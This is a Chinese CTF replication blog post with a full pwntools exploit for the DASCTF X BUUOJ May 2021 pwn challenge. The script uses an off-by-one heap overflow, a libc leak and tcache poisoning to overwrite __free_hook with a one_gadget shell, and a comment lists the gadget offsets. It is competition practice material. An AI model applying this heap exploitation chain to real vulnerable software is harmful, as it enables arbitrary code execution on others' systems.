[复现]2021 DASCTF X BUUOJ 五月大联动

由于我没ubuntu16就不复现第一个题了,直接第二个

正常的off by one

from pwn import *

context.os = 'linux'

context.log_level = "debug"

p = process('./pwn')

libc = ELF('./libc.so')

elf = ELF('./pwn')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

def add(idx, size, con):

	sla("choice:", "1")

	sla("please choice your card:", str(idx))

	sla("Infuse power:\n", str(size))

	sa("quickly!", con)

def edit(idx, con):

	sla("choice:", "2")

	sla("please choice your card\n", str(idx))

	sla("start your bomb show\n", con)

def delete(idx):

	sla("choice:", "3")

	sla("Which card:", str(idx))

def show(idx):

	sla("choice:", "4")

	sla("index:", str(idx))

add(0,0x18,'bpc')

add(1,0x20,'bpc')

add(2,0x20,'bpc')

add(3,0x20,'bpc')

for i in range(4, 11):

	add(i, 0x80, "bpc")

for i in range(4, 11):

	delete(i)

pl = 'a'*0x10 + p64(0) + p8(0x91)

edit(0,pl)

delete(1)

add(1,0x20,'bpc')

show(2)

ru("dedededededede:")

libcbase = uu64(r(6)) - 0x3EBCA0

leak('libcbase',libcbase)

free_hook = libcbase + libc.sym['__free_hook']

system = libcbase + 0x4f302

add(11,0x20,'bpc')

delete(11)

edit(2, p64(free_hook))

add(11, 0x20, "bpc")

add(12, 0x20,p64(system))

'''

0x4f2a5 execve("/bin/sh", rsp+0x40, environ)

constraints:

  rsp & 0xf == 0

  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)

constraints:

  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)

constraints:

  [rsp+0x70] == NULL

'''

#debug()

delete(12)

itr()

[复现]2021 DASCTF X BUUOJ 五月大联动-PWN的更多相关文章

  1. 从 Airflow 到 Apache DolphinScheduler,有赞大数据开发平台的调度系统演进

    点击上方 蓝字关注我们 作者 | 宋哲琦 ✎ 编 者 按 在不久前的 Apache  DolphinScheduler Meetup 2021 上,有赞大数据开发平台负责人 宋哲琦 带来了平台调度系统 ...

  2. 刷题记录:[强网杯 2019]Upload

    目录 刷题记录:[强网杯 2019]Upload 一.知识点 1.源码泄露 2.php反序列化 刷题记录:[强网杯 2019]Upload 题目复现链接:https://buuoj.cn/challe ...

  3. 刷题记录:[XNUCA2019Qualifier]EasyPHP

    目录 刷题记录:[XNUCA2019Qualifier]EasyPHP 解法一 1.error_log结合log_errors自定义错误日志 2.include_path设置包含路径 3.php_va ...

  4. Buuctf刷题:部分

    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...

  5. 【紧急】继续折腾,Log4j再发2.1.6,强烈建议升级

    背景 继前天正式发布的2.15.0之后,Apache log4j 2 团队宣布 Log4j 2.16.0 发布! 由于SLF4J适配兼容性的中断,Log4j 现在发布两个版本的SLF4J to Log ...

  6. 2012高校GIS论坛

    江苏省会议中心 南京·钟山宾馆(2012年4月21-22日) 以"突破与提升"为主题的"2012高校GIS论坛"将于4月在南京举行,由南京大学和工程中心共同承办 ...

  7. 1_ZedBoard开发板测试

    启动 将SD卡插入电脑进行格式化 格式化时,要将SD卡格式化为FAT32文件系统.块大小格式化为4096字节时后面会出现无法启动的情况,可以先复现一下这个错误.块大小我选择4096字节. 然后将Zed ...

  8. 刷题记录:[De1CTF 2019]Giftbox && Comment

    目录 刷题记录:[De1CTF 2019]Giftbox && Comment 一.知识点 1.sql注入 && totp 2.RCE 3.源码泄露 4.敏感文件读取 ...

  9. 刷题记录:[DDCTF 2019]homebrew event loop

    目录 刷题记录:[DDCTF 2019]homebrew event loop 知识点 1.逻辑漏洞 2.flask session解密 总结 刷题记录:[DDCTF 2019]homebrew ev ...

  10. 刷题记录:[CISCN2019 东北赛区 Day2 Web3]Point System

    目录 刷题记录:[CISCN2019 东北赛区 Day2 Web3]Point System 知识点 1.padding-oracle attack 2.cbc字节翻转攻击 3.FFMpeg文件读取漏 ...

随机推荐

  1. TODOList小黄条

    TODOList http://www.yynote.cn/ 总结 windows中的神器

  2. Linux-crontab定期执行程序的命令

    https://www.runoob.com/linux/linux-comm-crontab.html Linux crontab 是用来定期执行程序的命令. 当安装完成操作系统之后,默认便会启动此 ...

  3. Software--电商平台系统--P3 Product Catalogy 商品目录模块

    2018-01-15  15:25:20 商品目录 服务层 控制器层 ProductCate 服务层 Controller 控制器层

  4. jmeter非GUI模式之jtl文件解析

    我们知道非GUI模式的方式执行完成jmeter后,会生成jtl文件,里面打开后就是一行行的测试结果, <httpSample t="1" lt="1" t ...

  5. 启动 RMAN 客户端并与之交互

    启动和退出 RMAN RMAN 可执行文件与数据库一起自动安装,通常与其他数据库可执行文件位于同一目录中.例如,Linux 上的 RMAN 客户端位于$ORACLE_HOME/bin. 您有以下启动 ...

  6. nmap扫描

    Nmap扫描 学习老师发的链接中的指令:https://www.cnblogs.com/nmap/p/6232207.html 下载了nmap软件 根据教学中的操作查找虚拟机的IP地址 并用主机对其扫 ...

  7. linux虚拟机,ifconfig无法获取静态ip地址

    之前一直显示这种ip地址,如下图(网图),查看了DHCP,是正常启动的,虚拟网络编辑器中设置的也正确.后来发现更改虚拟机的设置后就可以了,如下: 设置方法:VMware-虚拟机-设置-网络适配器,选择 ...

  8. 通过cmd对数据库SQL进行创建表空间并创建用户

    通过cmd对数据库SQL进行创建表空间并创建用户 1.创建表空间:create tablespace stx(名字) datafile ' 目录路径\stx(名字).dbf ' size 64m; 2 ...

  9. CSRF跨站点请求伪造(Cross Site Request Forgery)攻击

    CSRF跨站点请求伪造(Cross Site Request Forgery)和XSS攻击一样,有巨大的危害性,就是攻击者盗用了用户的身份,以用户的身份发送恶意请求,但是对服务器来说这个请求是合理的, ...

  10. 算法题:消除字符串中全部的b和连续的ac

    最近碰到了一道面试题,虽然不难但是临试没想出好的解法,记录下来以作分享. 题目:消除字符串中全部的b和连续的ac 用例: 'aabbc' -> 'a' 'aaabbbccc' -> '' ...